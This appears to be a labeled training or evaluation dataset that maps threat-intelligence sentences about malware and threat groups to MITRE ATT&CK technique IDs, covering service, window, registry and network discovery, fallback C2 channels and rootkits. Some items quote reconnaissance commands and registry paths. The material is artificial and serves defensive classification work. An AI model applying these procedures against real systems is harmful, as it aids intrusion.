{"text1":"yty collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, .xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server.","labels":"['T1005']"}
|
|
{"text1":"After compromising a victim, Poseidon Group discovers all running services.","labels":"['T1007']"}
|
|
{"text1":"Aquatic Panda has attempted to discover services for third party EDR products.","labels":"['T1007']"}
|
|
{"text1":"BBSRAT can query service configuration information.","labels":"['T1007']"}
|
|
{"text1":"BRONZE BUTLER has used TROJ_GETVERSION to discover system services.","labels":"['T1007']"}
|
|
{"text1":"Babuk can enumerate all services running on a compromised host.","labels":"['T1007']"}
|
|
{"text1":"BitPaymer can enumerate existing Windows services on the host that are configured to run as LocalSystem.","labels":"['T1007']"}
|
|
{"text1":"Caterpillar WebShell can obtain a list of the services from a system.","labels":"['T1007']"}
|
|
{"text1":"Chimera has used \"net start\" and \"net use\" for system service discovery.","labels":"['T1007']"}
|
|
{"text1":"Cobalt Strike can enumerate services on compromised hosts.","labels":"['T1007']"}
|
|
{"text1":"Comnie runs the command: \"net start >> %TEMP%\\info.dat\" on a victim.","labels":"['T1007']"}
|
|
{"text1":"Cuba can query service status using \"QueryServiceStatusEx\" function.","labels":"['T1007']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors used the `net start` command as part of their initial reconnaissance.","labels":"['T1007']"}
|
|
{"text1":"During Operation Wocao, threat actors used the `tasklist` command to search for one of its backdoors.","labels":"['T1007']"}
|
|
{"text1":"Earth Lusca has used Tasklist to obtain information from a compromised host.","labels":"['T1007', 'T1057']"}
|
|
{"text1":"Emissary has the capability to execute the command \"net start\" to interact with services.","labels":"['T1007']"}
|
|
{"text1":"GravityRAT has a feature to list the available services on the system.","labels":"['T1007']"}
|
|
{"text1":"GreyEnergy enumerates all Windows services.","labels":"['T1007']"}
|
|
{"text1":"Heyoka Backdoor can check if it is running as a service on a compromised host.","labels":"['T1007']"}
|
|
{"text1":"HotCroissant has the ability to retrieve a list of services on the infected host.","labels":"['T1007']"}
|
|
{"text1":"Hydraq creates a backdoor through which remote attackers can monitor services.","labels":"['T1007']"}
|
|
{"text1":"JPIN can list running services.","labels":"['T1007']"}
|
|
{"text1":"Ke3chang performs service discovery using \"net start\" commands.","labels":"['T1007']"}
|
|
{"text1":"Kimsuky has used an instrumentor script to gather the names of all services running on a victim's system.","labels":"['T1007']"}
|
|
{"text1":"Kwampirs collects a list of running services with the command \"tasklist \/svc\".","labels":"['T1007']"}
|
|
{"text1":"LookBack can enumerate services on the victim machine.","labels":"['T1007']"}
|
|
{"text1":"OilRig has used \"sc query\" on a victim to gather information about services.","labels":"['T1007']"}
|
|
{"text1":"Operation Wocao has used the \"tasklist\" command to search for one of its backdoors.","labels":"['T1007']"}
|
|
{"text1":"RATANKBA uses \"tasklist \/svc\" to display running tasks.","labels":"['T1007']"}
|
|
{"text1":"REvil can enumerate active services.","labels":"['T1007']"}
|
|
{"text1":"SILENTTRINITY can search for modifiable services that could be used for privilege escalation.","labels":"['T1007']"}
|
|
{"text1":"SLOTHFULMEDIA has the capability to enumerate services.","labels":"['T1007']"}
|
|
{"text1":"SynAck enumerates all running services.","labels":"['T1007']"}
|
|
{"text1":"The \"net start\" command can be used in Net to find information about Windows services.","labels":"['T1007']"}
|
|
{"text1":"TrickBot collects a list of install programs and services on the system\u2019s machine.","labels":"['T1007']"}
|
|
{"text1":"Turla surveys a system upon check-in to discover running services and associated processes using the \"tasklist \/svc\" command.","labels":"['T1007']"}
|
|
{"text1":"Ursnif has gathered information about running services.","labels":"['T1007']"}
|
|
{"text1":"Volgmer queries the system to identify existing services.","labels":"['T1007']"}
|
|
{"text1":"WINERACK can enumerate services.","labels":"['T1007']"}
|
|
{"text1":"ZLib has the ability to discover and manipulate Windows services.","labels":"['T1007']"}
|
|
{"text1":"ZxShell can check the services on the system.","labels":"['T1007']"}
|
|
{"text1":"admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to obtain information about services: \"net start >> %temp%\\download\"","labels":"['T1007']"}
|
|
{"text1":"jRAT can list local services.","labels":"['T1007']"}
|
|
{"text1":"APT41 used the Steam community page as a fallback mechanism for C2.","labels":"['T1008']"}
|
|
{"text1":"Anchor can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.","labels":"['T1008']"}
|
|
{"text1":"AppleSeed can use a second channel for C2 when the primary channel is in upload mode.","labels":"['T1008']"}
|
|
{"text1":"BISCUIT malware contains a secondary fallback command and control server that is contacted after the primary command and control server.","labels":"['T1008']"}
|
|
{"text1":"BlackEnergy has the capability to communicate over a backup channel via plus.google.com.","labels":"['T1008']"}
|
|
{"text1":"Bumblebee can use backup C2 servers if the primary server fails.","labels":"['T1008']"}
|
|
{"text1":"CHOPSTICK can switch to a new C2 channel if the current one is broken.","labels":"['T1008']"}
|
|
{"text1":"Carbanak\u2019s Harpy backdoor malware can use DNS as a backup channel for C2 if HTTP fails.","labels":"['T1008']"}
|
|
{"text1":"Cardinal RAT can communicate over multiple C2 host and port combinations.","labels":"['T1008']"}
|
|
{"text1":"CharmPower can change its C2 channel once every 360 loops by retrieving a new domain from the actors\u2019 S3 bucket.","labels":"['T1008']"}
|
|
{"text1":"Crutch has used a hardcoded GitHub repository as a fallback channel.","labels":"['T1008']"}
|
|
{"text1":"During Night Dragon, threat actors used company extranet servers as secondary C2 servers.","labels":"['T1008']"}
|
|
{"text1":"DustySky has two hard-coded domains for C2 servers; if the first does not respond, it will try the second.","labels":"['T1008']"}
|
|
{"text1":"Ebury has implemented a fallback mechanism to begin using a DGA when the attacker hasn't connected to the infected system for three days.","labels":"['T1008']"}
|
|
{"text1":"Exaramel for Linux can attempt to find a new C2 server if it receives an error.","labels":"['T1008']"}
|
|
{"text1":"FatDuke has used several C2 servers per targeted organization.","labels":"['T1008']"}
|
|
{"text1":"Gelsemium can use multiple domains and protocols in C2.","labels":"['T1008']"}
|
|
{"text1":"HOPLIGHT has multiple C2 channels in place in case one fails.","labels":"['T1008']"}
|
|
{"text1":"InvisiMole has been configured with several servers available for alternate C2 communications.","labels":"['T1008']"}
|
|
{"text1":"Kazuar can accept multiple URLs for C2 servers.","labels":"['T1008']"}
|
|
{"text1":"Kevin can assign hard-coded fallback domains for C2.","labels":"['T1008']"}
|
|
{"text1":"Kwampirs uses a large list of C2 servers that it cycles through until a successful connection is established.","labels":"['T1008']"}
|
|
{"text1":"Linfo creates a backdoor through which remote attackers can change C2 servers.","labels":"['T1008']"}
|
|
{"text1":"Machete has sent data over HTTP if FTP failed, and has also used a fallback server.","labels":"['T1008']"}
|
|
{"text1":"MiniDuke uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working.","labels":"['T1008']"}
|
|
{"text1":"Mis-Type first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server.","labels":"['T1008']"}
|
|
{"text1":"NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request; otherwise it will send beacons via UDP\/6000.","labels":"['T1008']"}
|
|
{"text1":"PipeMon can switch to an alternate C2 domain when a particular date has been reached.","labels":"['T1008']"}
|
|
{"text1":"QUADAGENT uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful.","labels":"['T1008']"}
|
|
{"text1":"RDAT has used HTTP if DNS C2 communications were not functioning.","labels":"['T1008']"}
|
|
{"text1":"RainyDay has the ability to switch between TCP and HTTP for C2 if one method is not working.","labels":"['T1008']"}
|
|
{"text1":"S-Type primarily uses port 80 for C2, but falls back to ports 443 or 8080 if initial communication fails.","labels":"['T1008']"}
|
|
{"text1":"Shark can update its configuration to use a different C2 server.","labels":"['T1008']"}
|
|
{"text1":"SideTwist has primarily used port 443 for C2 but can use port 80 as a fallback.","labels":"['T1008']"}
|
|
{"text1":"SslMM has a hard-coded primary and backup C2 string.","labels":"['T1008']"}
|
|
{"text1":"TAINTEDSCRIBE can randomly pick one of five hard-coded IP addresses for C2 communication; if one of the IP fails, it will wait 60 seconds and then try another IP address.","labels":"['T1008']"}
|
|
{"text1":"The C2 server used by XTunnel provides a port number to the victim to use as a fallback in case the connection closes on the currently used port.","labels":"['T1008']"}
|
|
{"text1":"TinyTurla can go through a list of C2 server IPs and will try to register with each until one responds.","labels":"['T1008']"}
|
|
{"text1":"TrickBot can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.","labels":"['T1008']"}
|
|
{"text1":"Valak can communicate over multiple C2 hosts.","labels":"['T1008']"}
|
|
{"text1":"Aria-body has the ability to identify the titles of running windows on a compromised host.","labels":"['T1010']"}
|
|
{"text1":"Attor can obtain application window titles and then determines which windows to perform Screen Capture on.","labels":"['T1010']"}
|
|
{"text1":"Cadelspy has the ability to identify open windows on the compromised host.","labels":"['T1010']"}
|
|
{"text1":"Catchamas obtains application windows titles and then determines which windows to perform Screen Capture on.","labels":"['T1010']"}
|
|
{"text1":"DarkWatchman reports window names along with keylogger information to provide application context.","labels":"['T1010']"}
|
|
{"text1":"Flagpro can check the name of the window displayed on the system.","labels":"['T1010']"}
|
|
{"text1":"FunnyDream has the ability to discover application windows via execution of `EnumWindows`.","labels":"['T1010']"}
|
|
{"text1":"Grandoreiro can identify installed security tools based on window names.","labels":"['T1010']"}
|
|
{"text1":"HotCroissant has the ability to list the names of all open windows on the infected host.","labels":"['T1010']"}
|
|
{"text1":"InvisiMole can enumerate windows and child windows on a compromised host.","labels":"['T1010']"}
|
|
{"text1":"Lazarus Group malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground.","labels":"['T1010']"}
|
|
{"text1":"Metamorfo can enumerate all windows on the victim\u2019s machine.","labels":"['T1010']"}
|
|
{"text1":"NETWIRE can discover and close windows on controlled systems.","labels":"['T1010']"}
|
|
{"text1":"NetTraveler reports window names along with keylogger information to provide application context.","labels":"['T1010']"}
|
|
{"text1":"PLEAD has the ability to list open windows on the compromised host.","labels":"['T1010']"}
|
|
{"text1":"PoisonIvy captures window titles.","labels":"['T1010']"}
|
|
{"text1":"PowerDuke has a command to get text of the current foreground window.","labels":"['T1010']"}
|
|
{"text1":"ROKRAT can use the `GetForegroundWindow` and `GetWindowText` APIs to discover where the user is typing.","labels":"['T1010']"}
|
|
{"text1":"SOUNDBITE is capable of enumerating application windows.","labels":"['T1010']"}
|
|
{"text1":"The discovery modules used with Duqu can collect information on open windows.","labels":"['T1010']"}
|
|
{"text1":"Trojan.Karagany can monitor the titles of open windows to identify specific keywords.","labels":"['T1010']"}
|
|
{"text1":"WINERACK can enumerate active windows.","labels":"['T1010']"}
|
|
{"text1":"captures window titles.","labels":"['T1010']"}
|
|
{"text1":"njRAT gathers information about opened windows during the initial infection.","labels":"['T1010']"}
|
|
{"text1":"A Threat Group-3390 tool can read and decrypt stored Registry values.","labels":"['T1012']"}
|
|
{"text1":"A variant of HOPLIGHT hooks lsass.exe, and lsass.exe then checks the Registry for the data value 'rdpproto' under the key \"SYSTEM\\CurrentControlSet\\Control\\Lsa Name\".","labels":"['T1012']"}
|
|
{"text1":"ADVSTORESHELL can enumerate registry keys.","labels":"['T1012']"}
|
|
{"text1":"APT32's backdoor can query the Windows Registry to gather system information.","labels":"['T1012']"}
|
|
{"text1":"APT39 has used various strains of malware to query the Registry.","labels":"['T1012']"}
|
|
{"text1":"Attor has opened the registry and performed query searches.","labels":"['T1012']"}
|
|
{"text1":"BACKSPACE is capable of enumerating and making modifications to an infected system's Registry.","labels":"['T1012']"}
|
|
{"text1":"BabyShark has executed the \"reg query\" command for \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\".","labels":"['T1012']"}
|
|
{"text1":"Bankshot searches for certain Registry keys to be configured before executing the payload.","labels":"['T1012']"}
|
|
{"text1":"Bazar can query \"Windows\\CurrentVersion\\Uninstall\" for installed applications.","labels":"['T1012']"}
|
|
{"text1":"BendyBear can query the host's Registry key at \"HKEY_CURRENT_USER\\Console\\QuickEdit\" to retrieve data.","labels":"['T1012']"}
|
|
{"text1":"Brave Prince gathers information about the Registry.","labels":"['T1012']"}
|
|
{"text1":"Bumblebee can check the Registry for specific keys.","labels":"['T1012']"}
|
|
{"text1":"CHOPSTICK provides access to the Windows Registry, which can be used to gather information.","labels":"['T1012']"}
|
|
{"text1":"Carbanak checks the Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" for proxy configurations information.","labels":"['T1012']"}
|
|
{"text1":"Carberp has searched the Image File Execution Options registry key for \"Debugger\" within every subkey.","labels":"['T1012']"}
|
|
{"text1":"CharmPower has the ability to enumerate `Uninstall` registry values.","labels":"['T1012']"}
|
|
{"text1":"Clambling has the ability to enumerate Registry keys, including \"HKEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt\\strDataDir\" to search for a bitcoin wallet.","labels":"['T1012']"}
|
|
{"text1":"Cobalt Strike can query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Excel Version>\\Excel\\Security\\AccessVBOM\\\" to determine if the security setting for restricting default programmatic access is enabled.","labels":"['T1012']"}
|
|
{"text1":"ComRAT can check the default browser by querying \"HKCR\\http\\shell\\open\\command\".","labels":"['T1012']"}
|
|
{"text1":"Denis queries the Registry for keys and values.","labels":"['T1012']"}
|
|
{"text1":"Dragonfly 2.0 queried the Registry to identify victim information.","labels":"['T1012']"}
|
|
{"text1":"Dragonfly has queried the Registry to identify victim information.","labels":"['T1012']"}
|
|
{"text1":"Epic uses the \"rem reg query\" command to obtain values from Registry keys.","labels":"['T1012']"}
|
|
{"text1":"FELIXROOT queries the Registry for specific keys for potential privilege escalation and proxy information. FELIXROOT has also used WMI to query the Windows Registry.","labels":"['T1012']"}
|
|
{"text1":"FatDuke can get user agent strings for the default browser from \"HKCU\\Software\\Classes\\http\\shell\\open\\command\".","labels":"['T1012']"}
|
|
{"text1":"Gelsemium can open random files and Registry keys to obscure malware behavior from sandbox analysis.","labels":"['T1012']"}
|
|
{"text1":"Gold Dragon enumerates registry keys with the command \"regkeyenum\" and obtains information for the Registry key \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\".","labels":"['T1012']"}
|
|
{"text1":"Hydraq creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys.","labels":"['T1012']"}
|
|
{"text1":"Industroyer has a data wiper component that enumerates keys in the Registry \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\".","labels":"['T1012']"}
|
|
{"text1":"InvisiMole can enumerate Registry values, keys, and data.","labels":"['T1012']"}
|
|
{"text1":"JPIN can enumerate Registry keys.","labels":"['T1012']"}
|
|
{"text1":"Kimsuky has obtained specific Registry keys and values on a compromised host.","labels":"['T1012']"}
|
|
{"text1":"Lazarus Group malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnywhere, and Remote Desktop. Another Lazarus Group malware sample checks for the presence of the following Registry key: \"HKEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt\".","labels":"['T1012']"}
|
|
{"text1":"Lucifer can check for existing stratum cryptomining information in \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\spreadCpuXmr \u2013 %stratum info%\".","labels":"['T1012']"}
|
|
{"text1":"Milan can query `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography MachineGuid` to retrieve the machine GUID.","labels":"['T1012']"}
|
|
{"text1":"Mori can read data from the Registry including from `HKLM\\Software\\NFC\\IPA` and\n`HKLM\\Software\\NFC\\`.","labels":"['T1012']"}
|
|
{"text1":"OSInfo queries the registry to look for information about Terminal Services.","labels":"['T1012']"}
|
|
{"text1":"OilRig has used \"reg query \u201cHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\u201d\" on a victim to query the Registry.","labels":"['T1012']"}
|
|
{"text1":"Operation Wocao has queried the registry to detect recent PuTTY sessions.","labels":"['T1012']"}
|
|
{"text1":"POWERSOURCE queries Registry keys in preparation for setting Run keys to achieve persistence.","labels":"['T1012']"}
|
|
{"text1":"PcShare can search the registry files of a compromised host.","labels":"['T1012']"}
|
|
{"text1":"Pillowmint has used shellcode which reads code stored in the registry keys \"\\REGISTRY\\SOFTWARE\\Microsoft\\DRM\" using the native Windows API as well as read \"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\" as part of its C2.","labels":"['T1012']"}
|
|
{"text1":"Proxysvc gathers product names from the Registry key: \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion ProductName\" and the processor description from the Registry key \"HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0 ProcessorNameString\".","labels":"['T1012']"}
|
|
{"text1":"ROKRAT can access the \"HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData\" Registry key to obtain the System manufacturer value to identify the machine type.","labels":"['T1012']"}
|
|
{"text1":"Reaver queries the Registry to determine the correct Startup path to use for persistence.","labels":"['T1012']"}
|
|
{"text1":"Rising Sun has identified the OS product name from a compromised host by searching the registry for `SOFTWARE\\MICROSOFT\\Windows NT\\ CurrentVersion | ProductName`.","labels":"['T1012']"}
|
|
{"text1":"SILENTTRINITY can use the `GetRegValue` function to check Registry keys within `HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated` and `HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated`. It also contains additional modules that can check software AutoRun values and use the Win32 namespace to get values from HKCU, HKLM, HKCR, and HKCC hives.","labels":"['T1012']"}
|
|
{"text1":"Shark can query `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography MachineGuid` to retrieve the machine GUID.","labels":"['T1012']"}
|
|
{"text1":"Sibot has queried the registry for proxy server information.","labels":"['T1012']"}
|
|
{"text1":"Stealth Falcon malware attempts to determine the installed version of .NET by querying the Registry.","labels":"['T1012']"}
|
|
{"text1":"StoneDrill has looked in the registry to find the default browser path.","labels":"['T1012']"}
|
|
{"text1":"TEARDROP checked that \"HKU\\SOFTWARE\\Microsoft\\CTF\" existed before decoding its embedded payload.","labels":"['T1012']"}
|
|
{"text1":"Taidoor can query the Registry on compromised hosts using \"RegQueryValueExA\".","labels":"['T1012']"}
|
|
{"text1":"TinyTurla can query the Registry for its configuration information.","labels":"['T1012']"}
|
|
{"text1":"Turla surveys a system upon check-in to discover information in the Windows Registry with the \"reg query\" command. Turla has also retrieved PowerShell payloads hidden in Registry keys as well as checking keys associated with null session named pipes.","labels":"['T1012']"}
|
|
{"text1":"Valak can use the Registry for code updates and to collect credentials.","labels":"['T1012']"}
|
|
{"text1":"Volgmer checks the system for certain Registry keys.","labels":"['T1012']"}
|
|
{"text1":"WINDSHIELD can gather Registry values.","labels":"['T1012']"}
|
|
{"text1":"WastedLocker checks for specific registry keys related to the \"UCOMIEnumConnections\" and \"IActiveScriptParseProcedure32\" interfaces.","labels":"['T1012']"}
|
|
{"text1":"Waterbear can query the Registry key \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\" to see if the value `OracleOcilib` exists.","labels":"['T1012']"}
|
|
{"text1":"ZIRCONIUM has used a tool to query the Registry for proxy settings.","labels":"['T1012']"}
|
|
{"text1":"Zeus Panda checks for the existence of a Registry key and if it contains certain values.","labels":"['T1012']"}
|
|
{"text1":"ZxShell can query the netsvc group value data located in the svchost group Registry key.","labels":"['T1012']"}
|
|
{"text1":"ZxxZ can search the registry of a compromised host.","labels":"['T1012']"}
|
|
{"text1":"gh0st RAT has checked for the existence of a Service key to determine if it has already been installed on the system.","labels":"['T1012']"}
|
|
{"text1":"njRAT can read specific registry values.","labels":"['T1012']"}
|
|
{"text1":"APT28 has used a UEFI (Unified Extensible Firmware Interface) rootkit known as LoJax.","labels":"['T1014']"}
|
|
{"text1":"APT41 deployed rootkits on Linux systems.","labels":"['T1014']"}
|
|
{"text1":"Caterpillar WebShell has a module to use a rootkit on a system.","labels":"['T1014']"}
|
|
{"text1":"Drovorub has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view.","labels":"['T1014']"}
|
|
{"text1":"Ebury has used user mode rootkit techniques to remain hidden on the system.","labels":"['T1014']"}
|
|
{"text1":"HIDEDRV is a rootkit that hides certain operating system artifacts.","labels":"['T1014']"}
|
|
{"text1":"Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.","labels":"['T1014', 'T1542.001']"}
|
|
{"text1":"HiddenWasp uses a rootkit to hook and implement functions on the system.","labels":"['T1014']"}
|
|
{"text1":"LoJax is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.","labels":"['T1014', 'T1542.001']"}
|
|
{"text1":"PoisonIvy starts a rootkit from a malicious file dropped to disk.","labels":"['T1014']"}
|
|
{"text1":"Ramsay has included a rootkit to evade defenses.","labels":"['T1014']"}
|
|
{"text1":"Rocke has modified \/etc\/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.","labels":"['T1014', 'T1574.006']"}
|
|
{"text1":"Skidmap is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low.","labels":"['T1014']"}
|
|
{"text1":"Stuxnet uses a Windows rootkit to mask its binaries and other relevant files.","labels":"['T1014']"}
|
|
{"text1":"Umbreon hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware.","labels":"['T1014']"}
|
|
{"text1":"Uroburos is a rootkit used by Turla.","labels":"['T1014']"}
|
|
{"text1":"WarzoneRAT can include a rootkit to hide processes, files, and startup.","labels":"['T1014']"}
|
|
{"text1":"Winnti Group used a rootkit to modify typical server functionality.","labels":"['T1014']"}
|
|
{"text1":"Winnti for Linux has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity.","labels":"['T1014']"}
|
|
{"text1":"A JHUHUGIT variant gathers network interface card information.","labels":"['T1016']"}
|
|
{"text1":"A keylogging tool used by APT3 gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway.","labels":"['T1016']"}
|
|
{"text1":"APT1 used the \"ipconfig \/all\" command to gather network configuration information.","labels":"['T1016']"}
|
|
{"text1":"APT19 used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim\u2019s machine.","labels":"['T1016']"}
|
|
{"text1":"APT41 collected MAC addresses from victim machines.","labels":"['T1016']"}
|
|
{"text1":"Action RAT has the ability to collect the MAC address of an infected host.","labels":"['T1016']"}
|
|
{"text1":"AdFind can extract subnet information from Active Directory.","labels":"['T1016']"}
|
|
{"text1":"Agent Tesla can collect the IP address of the victim machine and spawn instances of netsh.exe to enumerate wireless settings.","labels":"['T1016']"}
|
|
{"text1":"Agent.btz collects the network adapter\u2019s IP and MAC address as well as IP addresses of the network adapter\u2019s default gateway, primary\/secondary WINS, DHCP, and DNS servers, and saves them into a log file.","labels":"['T1016']"}
|
|
{"text1":"Amadey can identify the IP address of a victim machine.","labels":"['T1016']"}
|
|
{"text1":"AppleSeed can identify the IP of a targeted system.","labels":"['T1016']"}
|
|
{"text1":"Astaroth collects the external IP address from the system.","labels":"['T1016']"}
|
|
{"text1":"Azorult can collect host IP information from the victim\u2019s machine.","labels":"['T1016']"}
|
|
{"text1":"BADCALL collects the network adapter information.","labels":"['T1016']"}
|
|
{"text1":"BADFLICK has captured victim IP address details.","labels":"['T1016']"}
|
|
{"text1":"BLINDINGCAN has collected the victim machine's local IP address information and MAC address.","labels":"['T1016']"}
|
|
{"text1":"Backdoor.Oldrea collects information about the Internet adapter configuration.","labels":"['T1016']"}
|
|
{"text1":"Bazar can collect the IP address and NetBIOS name of an infected machine.","labels":"['T1016']"}
|
|
{"text1":"BlackEnergy has gathered information about network IP configurations using ipconfig.exe and about routing tables using route.exe.","labels":"['T1016']"}
|
|
{"text1":"Bonadan can find the external IP address of the infected host.","labels":"['T1016']"}
|
|
{"text1":"BoxCaon can collect the victim's MAC address by using the \"GetAdaptersInfo\" API.","labels":"['T1016']"}
|
|
{"text1":"Calisto runs the \"ifconfig\" command to obtain the IP address from the victim\u2019s machine.","labels":"['T1016']"}
|
|
{"text1":"Carbon can collect the IP address of the victims and other computers on the network using the commands: \"ipconfig -all\", \"nbtstat -n\", and \"nbtstat -s\".","labels":"['T1016']"}
|
|
{"text1":"Catchamas gathers the MAC address, IP address, and the network adapter information from the victim\u2019s machine.","labels":"['T1016']"}
|
|
{"text1":"Caterpillar WebShell can gather the IP address from the victim's machine using the \"ipconfig\" command.","labels":"['T1016']"}
|
|
{"text1":"CharmPower has the ability to use \"ipconfig\" to enumerate system network settings.","labels":"['T1016']"}
|
|
{"text1":"Chimera has used ipconfig, Ping, and \"tracert\" to enumerate the IP address and network environment and settings of the local host.","labels":"['T1016']"}
|
|
{"text1":"Clambling can enumerate the IP address of a compromised machine.","labels":"['T1016']"}
|
|
{"text1":"Cobalt Strike can determine the IP addresses of domain controllers.","labels":"['T1016']"}
|
|
{"text1":"Cobalt Strike can determine the NetBIOS name and the IP addresses of target machines including domain controllers.","labels":"['T1016']"}
|
|
{"text1":"Comnie uses \"ipconfig \/all\" and \"route PRINT\" to identify network adapter and interface information.","labels":"['T1016']"}
|
|
{"text1":"Conti can retrieve the ARP cache from the local system by using the \"GetIpNetTable()\" API call and check to ensure IP addresses it connects to are for local, non-Internet, systems.","labels":"['T1016']"}
|
|
{"text1":"CrackMapExec can collect DNS information from the targeted system.","labels":"['T1016']"}
|
|
{"text1":"Crimson contains a command to collect the victim MAC address and LAN IP.","labels":"['T1016']"}
|
|
{"text1":"Cuba can retrieve the ARP cache from the local system by using \"GetIpNetTable\".","labels":"['T1016']"}
|
|
{"text1":"Denis uses \"ipconfig\" to gather the IP address from the system.","labels":"['T1016']"}
|
|
{"text1":"Diavol can enumerate victims' local and external IPs when registering with C2.","labels":"['T1016']"}
|
|
{"text1":"Dragonfly 2.0 used batch scripts to enumerate network information, including information about trusts, zones, and the domain.","labels":"['T1016']"}
|
|
{"text1":"Dragonfly has used batch scripts to enumerate network information, including information about trusts, zones, and the domain.","labels":"['T1016']"}
|
|
{"text1":"Dtrack can collect the host's IP addresses using the \"ipconfig\" command.","labels":"['T1016']"}
|
|
{"text1":"During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.","labels":"['T1016']"}
|
|
{"text1":"During Frankenstein, the threat actors used Empire to find the public IP address of a compromised system.","labels":"['T1016']"}
|
|
{"text1":"During FunnyDream, the threat actors used ipconfig for discovery on remote systems.","labels":"['T1016']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors used `ipconfig`, `nbtstat`, `tracert`, `route print`, and `cat \/etc\/hosts` commands.","labels":"['T1016']"}
|
|
{"text1":"During Operation Wocao, threat actors discovered the local network configuration with `ipconfig`.","labels":"['T1016']"}
|
|
{"text1":"Dyre has the ability to identify network settings on a compromised host.","labels":"['T1016']"}
|
|
{"text1":"Earth Lusca used the command \"ipconfig\" to obtain information about network configurations.","labels":"['T1016']"}
|
|
{"text1":"Elise executes \"ipconfig \/all\" after initial communication is made to the remote server.","labels":"['T1016']"}
|
|
{"text1":"Emissary has the capability to execute the command \"ipconfig \/all\".","labels":"['T1016']"}
|
|
{"text1":"Empire can acquire network configuration information like DNS servers, public IP, and network proxies used by a host.","labels":"['T1016']"}
|
|
{"text1":"Epic uses the \"nbtstat -n\" and \"nbtstat -s\" commands on the victim\u2019s machine.","labels":"['T1016']"}
|
|
{"text1":"Explosive has collected the MAC address from the victim's machine.","labels":"['T1016']"}
|
|
{"text1":"FELIXROOT collects information about the network including the IP address and DHCP server.","labels":"['T1016']"}
|
|
{"text1":"FatDuke can identify the MAC address on the target computer.","labels":"['T1016']"}
|
|
{"text1":"Felismus collects the victim LAN IP address and sends it to the C2 server.","labels":"['T1016']"}
|
|
{"text1":"Flagpro has been used to execute the \"ipconfig \/all\" command on a victim system.","labels":"['T1016']"}
|
|
{"text1":"FunnyDream can parse the `ProxyServer` string in the Registry to discover http proxies.","labels":"['T1016']"}
|
|
{"text1":"GALLIUM used \"ipconfig \/all\" to obtain information about the victim network configuration. The group also ran a modified version of NBTscan to identify available NetBIOS name servers.","labels":"['T1016']"}
|
|
{"text1":"GeminiDuke collects information on network settings and Internet proxy settings from the victim.","labels":"['T1016']"}
|
|
{"text1":"GoldMax retrieved a list of the system's network interfaces after execution.","labels":"['T1016']"}
|
|
{"text1":"Grandoreiro can determine the IP and physical location of the compromised host via IPinfo.","labels":"['T1016']"}
|
|
{"text1":"GravityRAT collects the victim IP address, MAC address, as well as the victim account domain name.","labels":"['T1016']"}
|
|
{"text1":"GrimAgent can enumerate the IP and domain of a target system.","labels":"['T1016']"}
|
|
{"text1":"HotCroissant has the ability to identify the IP address of the compromised machine.","labels":"['T1016']"}
|
|
{"text1":"Hydraq creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines.","labels":"['T1016']"}
|
|
{"text1":"Industroyer\u2019s 61850 payload component enumerates connected network adapters and their corresponding IP addresses.","labels":"['T1016']"}
|
|
{"text1":"Ixeshe enumerates the IP address, network proxy settings, and domain name from a victim's system.","labels":"['T1016']"}
|
|
{"text1":"JPIN can obtain network information, including DNS, IP, and proxies.","labels":"['T1016']"}
|
|
{"text1":"KEYMARBLE gathers the MAC address of the victim\u2019s machine.","labels":"['T1016']"}
|
|
